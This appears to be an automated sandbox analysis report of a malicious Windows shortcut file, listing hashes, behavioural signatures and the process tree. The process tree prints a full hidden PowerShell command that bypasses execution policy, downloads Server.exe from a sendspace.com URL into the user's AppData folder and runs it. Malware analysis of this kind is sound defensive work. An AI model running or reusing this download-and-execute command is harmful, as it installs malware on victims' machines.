Analysis
-
max time kernel
15s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 05:26
Static task
static1
Behavioral task
behavioral1
Sample
ecec64ff5ce641a4a1f05deb155d6653_JaffaCakes118.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ecec64ff5ce641a4a1f05deb155d6653_JaffaCakes118.lnk
Resource
win10v2004-20240802-en
General
-
Target
ecec64ff5ce641a4a1f05deb155d6653_JaffaCakes118.lnk
-
Size
1KB
-
MD5
ecec64ff5ce641a4a1f05deb155d6653
-
SHA1
667b41d91c36d624fb0d7d08c19eb973af38d67b
-
SHA256
e8e6b762a9821d12a4df9a03ba70d24c1b635a83f97487f477ceb7592f4aceee
-
SHA512
ef9aba73378d49be846a435de3d280fc239710545e3762b48920ee7a8af2508907ef84cd29670d3622895214f1a2f852df41d4372dd23d00d20e7d3ec1399f58
Malware Config
Extracted
https://fs05n4.sendspace.com/dl/a948bd21e0b879fdb7c01047131595ff/59b09db20625e3ed/ehlbqu/Server.exe
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2876 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2876 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 880 wrote to memory of 2876 880 cmd.exe 31 PID 880 wrote to memory of 2876 880 cmd.exe 31 PID 880 wrote to memory of 2876 880 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ecec64ff5ce641a4a1f05deb155d6653_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://fs05n4.sendspace.com/dl/a948bd21e0b879fdb7c01047131595ff/59b09db20625e3ed/ehlbqu/Server.exe','C:\Users\Admin\AppData\Roaming\AtualizaoJava');Start-Process 'C:\Users\Admin\AppData\Roaming\AtualizaoJava'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-